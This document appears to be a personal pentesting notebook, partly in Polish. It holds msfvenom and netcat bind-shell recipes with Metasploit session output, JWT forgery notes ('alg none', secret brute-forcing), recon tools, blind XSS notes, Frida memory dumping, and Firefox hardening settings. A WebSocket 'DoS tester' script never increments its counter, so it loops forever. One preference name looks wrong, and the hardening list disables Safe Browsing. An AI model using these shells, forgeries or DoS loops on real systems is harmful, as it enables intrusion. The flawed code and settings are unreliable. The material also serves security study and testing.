bind shell

msvenom bind shell:

vitim:
msfvenom -p linux/x64/shell_bind_tcp  LPORT=2222  -f elf > shell.elf
./shell.elf

attacker:
nc IP_VICTIM 2222
python -c 'import pty;pty.spawn("/bin/bash")'

OR

msf exploit(multi/handler) > use multi/handler
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  2222             yes       The listen port
   RHOST  172.21.65.139    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.21.65.139:2222
[*] Command shell session 3 opened (10.0.3.15:46445 -> 172.21.65.139:2222) at 2018-12-12 11:54:51 +0100


ls
dirtyc0w

netcat:
nc -lvp 8080 -e /bin/bash <- victim
nc IP_VICTIM 8080 <-- attacker


Bind shell meterpreter

victim:
msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=2223 -f elf > shell_meterpreter_bind_2223.elf

chmod +x shell_meterpreter_bind_2223.elf

./shell_meterpreter_bind_2223.elf

attacker:

msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description

   ----  ---------------  --------  -----------

Payload options (linux/x86/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description

   ----   ---------------  --------  -----------

   LPORT  2223             yes       The listen port

   RHOST  172.21.65.139    no        The target address

Exploit target:

   Id  Name

   --  ----

   0   Wildcard Target

msf exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.21.65.139:2223

[*] Sending stage (861480 bytes) to 172.21.65.139

[*] Meterpreter session 6 opened (10.0.3.15:41461 -> 172.21.65.139:2223) at 2018-12-12 12:04:01 +0100

meterpreter >

Hardening firefox

[about:config]
privacy.firstparty.isolate = true
privacy.resistFingerprint = true
privacy.trackingprotection.enabled = true
privacy.donottrackheader.enabled = true
privacy.donottrackheader.value = 1
browser.cache.disk.enable = false
browser.cache.disk.filesystem_reported = 1
browser.cache.disk.smart_size.first_run = false
browser.cache.disk.cache_ssl = false
browser.cache.disk.frecency_experiment = 2
browser.cache.offline.enable = false
browser.safebrowsing.malware.enabled = false
browser.safebrowsing.phishing.enabled = false
browser.send_pings = false
browser.sessionstore.max_tabs_undo = 0
browser.urlbar.speculativeConnect.enabled = false
browser.sessionstore.privacy_level = 2
browser.privatebrowsing.autostart = true
browser.safebrowsing.appRepURL = (empty)
dom.battery.enabled = false
dom.event.clipboardevents.enabled = true
dom.indexedDB.enabled = false
dom.storage.enabled = false
geo.enabled = false
geo.wifi.uri = (empty)
media.navigator.enabled = false
network.cookie.cookieBehavior = 1
network.cookie.lifetimePolicy = 2
network.http.referer.trimmingPolicy = 2
network.http.referer.XOriginPolicy = 2
network.http.referer.XOriginTrimmingPolicy = 2
network.prefetch-next = false
network.http.referer.spoofSource = true
network.dns.disablePrefetch = true
network.IDN_show_punycode = true
webgl.disabled = true
beacon.enabled = false
media.video_stats.enabled = false
media.peerconnection.enabled = false
media.peerconnection.dtmf.enabled = false
media.peerconnection.ice.default_address_only = true
media.peerconnection.ice.no_host = true
media.peerconnection.identity.enabled = false
media.peerconnection.simulcast = false
media.peerconnection.turn.disable = true
media.peerconnection.use_document_iceservers = false
media.peerconnection.video.enabled = false
media.peerconnection.video.vp9_enabled = false
security.ssl3.rsa_aes_128_sha = false
security.ssl3.rsa_aes_256_sha = false
security.ssl3.rsa_des_ede3_sha = false
general.useragent.site_specific_overrides = true


Plugins:

https://addons.mozilla.org/en-US/firefox/addon/https-everywhere/
https://addons.mozilla.org/en-US/firefox/addon/canvasblocker/
https://addons.mozilla.org/en-US/firefox/addon/noscript/
https://addons.mozilla.org/en-US/firefox/addon/privacy-badger17/ 



Check your browser's properties with:

https://check.torproject.org/
https://ip-check.info/?lang=en
https://ipleak.net/

Android - analiza dynamiczna aplikacji

https://github.com/ac-pm/Inspeckage
https://vimeo.com/156745941

JWT - JSON Web Tokens

Notatki z SHP

JTW - bezpieczna wymiana informacji wykorzystująca json pomiędzy dwoma apkami 

Rozkowanie base64 (wiec nie zapewnia poufności) 

Httparchive 

GoogleBigquery i wyszukiwanie danych z httparchive (np. Tokenow jwt, authorization basic itp)

1. Bruteforce hasla do JWT (np. Hashcatem)
2. Zmiana algorytmu szyfrującego (np. Z HS256) JWT na none 

• Uwaga na JWT.io jak wpiszemy alg none to nie pokaże wyników (trzeba samemu base64 codowac

 3. Resign-vuln - szyfruje kluczem prywatnym RSA mój token, a publiczny klucz RSA wrzucam w headerze

JWT WYGLADA TAK:  NAGLOWEK.DANE.PODPIS

sekurak.pl/jwt-ebook.pdf < opis JWT wraz z checlista ]

Rekonesans IT

Notatki z SHP

gotcha.pw - wyciek hasel (pobranie bazy bez gwiazdek? Tak)

https://www.zoomeye.org/ /shodan : (zoomeye: +django +debug.) (W shodan has_screenshot:yes) 

crt.sh  - %domena.pl (szuka subdomen)

builtwith.com/ -pokazuje z jakich technologi zbudowana jest infra,
zakładka relationship profile pokazuje kody trackujace i pokazać inne site które z niego korzystają :) 

hardenize.com - skaner bezpieczenstwa 

android.fallible.co - szuka sekretnych danych w apce mobilnej 

publicwww.com - wyszukiwarka kodow zrodlowych html,css,javascriptow - szukamy tutaj np. Malwarow itp, poszukac klucze api (wpisujac w wyszukiwarke apikey)

github.com/michenriksen/aquatone - szuka subdomen  (szuka we wszystkim virustotal(trzeba dac api key, crt.sh webarchive, itp)

Virustotal.com - search: twitter.com (do szukania subdomen) / szukanie tez wirtualnych domen klikając na IP w wynikach wyszukiwania 

archive.org - szukanie starych linków do aktualnych zasobow, jak juz jest nowa www a stary zasob moze zostal, szukanie tez podd omen

Blind XSS

Notatki z SHP

Prezentacja https://bentkowski.info/shp-gliwice

Excessy - narzędzie do XSS , używające websockets od Michała Bentkowskiego

XSS PROXY - https://github.com/securityMB/excessy 

iframe=sanbox jako ochrona przed xss

1. request get aby pobrać token csrf
2. Potem post aby go użyć

WebSocket DoS tester

Pyhton client - websocket denial of service tester


import websocket
import ssl
from websocket import create_connection



counter = 0
while counter <= 100:
        ws = websocket.WebSocket(sslopt={"cert_reqs": ssl.CERT_NONE})

        ws.connect("wss://echo.websocket.org")
        print("Sending 'Hello, World'...")
        ws.send("Hello, World")
        print("Sent")
        print("'%s'" % counter)
        print("Receiving...")
        result =  ws.recv()
        print("Received '%s'" % result)
        counter +1

Android - frida - memory dump app

https://www.frida.re/docs/android/
https://github.com/Nightbringer21/fridump
/fridump# python fridump.py -U -s -o . --max-size 2097152 com.app-name.rc.nopin
http://pentestcorner.com/fridump-android-examples/


D:\Android\sdk\platform-tools>adb shell "su -c /data/local/tmp/frida-server &"

How to install NDK with Android SDK Manager [windows]

1. Close Android SDK Manager
2. Start a Command Prompt as Administrator
3. cd"path to your installation of Android SDK Manager"\tools\bin
4. sdkmanager ndk-bundle
5. Accept the License Agreement
6. Wait a long time. The installation is done without any progress indicator.
7. When it finally reports done, start Android SDK Manager
8. Look under Extras and there you'll find Ndk Bundle

https://stackoverflow.com/questions/41471000/how-to-install-ndk-with-android-sdk-manager